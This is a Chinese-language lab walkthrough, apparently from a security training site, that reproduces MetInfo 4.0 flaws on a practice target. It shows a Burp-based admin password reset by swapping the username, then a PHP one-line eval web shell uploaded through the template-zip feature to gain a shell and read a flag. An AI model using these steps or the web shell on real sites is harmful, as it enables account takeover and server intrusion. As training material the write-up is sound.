【靶机实战】MetInfo4.0 漏洞复现

在线靶场

可以通过访问极核官方靶场开启靶机实验:极核靶场 -> 漏洞复现靶场 -> MetInfo 4.0

简介

MetInfo是一个开源的CMS程序,4.0版本存在任意用户密码重置以及文件上传的漏洞。

漏洞复现

任意用户密码重置

打开网站首页,然后访问robots.txt文件,获取关键信息:

  • 管理员后台:/admin/
  • 用户登录:/member/
图片[1] - 【靶机实战】MetInfo4.0 漏洞复现 - 极核GetShell

打开用户登录界面,注册一个账号后并且登录

图片[2] - 【靶机实战】MetInfo4.0 漏洞复现 - 极核GetShell
图片[3] - 【靶机实战】MetInfo4.0 漏洞复现 - 极核GetShell

登录上刚才注册的账号,然后点击修改基本信息,输入任意的密码,然后打开BurpSuite抓包软件后,点击提交信息,抓取数据包。

然后将数据包中的test(你自己注册的用户名)改为admin(管理员用户名),然后放行数据包,这样就完成了修改了admin用户(管理员账号)的密码。

图片[4] - 【靶机实战】MetInfo4.0 漏洞复现 - 极核GetShell
图片[5] - 【靶机实战】MetInfo4.0 漏洞复现 - 极核GetShell

访问管理员后台,输入账号:admin / 你修改的密码,成功进入后台!

图片[6] - 【靶机实战】MetInfo4.0 漏洞复现 - 极核GetShell

文件上传漏洞

准备一个一句话木马:<?php eval($_POST["cmd"]); ?>,然后重命名为shell.php,然后将shell.php压缩为shell.zip

图片[7] - 【靶机实战】MetInfo4.0 漏洞复现 - 极核GetShell

进入网站后台 -> 界面风格 -> 模板管理,找到添加新模板,上传刚才制作的shell.zip压缩包。

图片[8] - 【靶机实战】MetInfo4.0 漏洞复现 - 极核GetShell

上传后会自动将压缩包里面的shell.php文件解压到网站的/templates/目录下,也就是说现在只需要访问url/templates/shell.php即可访问到我们上传的一句话木马了。

图片[9] - 【靶机实战】MetInfo4.0 漏洞复现 - 极核GetShell

权限获取

使用蚁剑进行连接测试,发现可以连接刚才上传的一句话木马,连接后进入页面。

图片[10] - 【靶机实战】MetInfo4.0 漏洞复现 - 极核GetShell
图片[11] - 【靶机实战】MetInfo4.0 漏洞复现 - 极核GetShell

访问根目录 / ,即可看到flag文件!至此已成功拿下靶机!

图片[12] - 【靶机实战】MetInfo4.0 漏洞复现 - 极核GetShell
THE END
想说的话 1  网站运营艰难(真的难),以真心❤️换真心💕,如果帮助到你,可以 开通金贝会员 支持一下本站!
2  请不要进行任何非授权的网络攻击,如果造成任何损失均由使用者本人负责,与本站和原作者无关!
点赞73 分享
茶谈区 抢沙发

请登录后发表评论

    暂无评论内容